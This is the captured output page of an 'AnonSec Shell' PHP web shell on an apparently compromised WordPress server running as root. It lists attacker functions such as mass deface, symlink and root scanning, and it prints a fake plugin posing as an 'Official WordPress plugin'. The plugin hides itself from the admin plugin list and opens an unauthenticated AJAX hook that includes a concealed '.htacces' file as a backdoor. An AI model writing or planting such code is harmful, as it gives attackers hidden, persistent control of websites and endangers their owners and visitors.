AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 3.145.52.144   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/plugins/wp-cybersociology-kinship/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/plugins/wp-cybersociology-kinship/wp-cybersociology-kinship.php
<?php
/*
Plugin Name: WP Cybersociology Kinship
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 20.0.1
Author URI: http://wordpress.org/#
*/

function myd_hide()
{
	global $wp_list_table;

    if (!isset($wp_list_table)) {
        return;
    }

    $h = array('wp-cybersociology-kinship/wp-cybersociology-kinship.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $h)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

add_action('pre_current_active_plugins', 'myd_hide');

function asc_hide_p($plugins)
{
    $p = 'wp-cybersociology-kinship/wp-cybersociology-kinship.php';
    if (array_key_exists($p, $plugins)) {
        unset($plugins[$p]);
    }
    return $plugins;
}

add_filter('all_plugins', 'asc_hide_p');

function jtc_ajax_handler() {
    include plugin_dir_path(__FILE__) . '.htacces';
    wp_die();
}

add_action('wp_ajax_wp-ibw', 'jtc_ajax_handler');
add_action('wp_ajax_nopriv_wp-ibw', 'jtc_ajax_handler');

Anon7 - 2022
AnonSec Team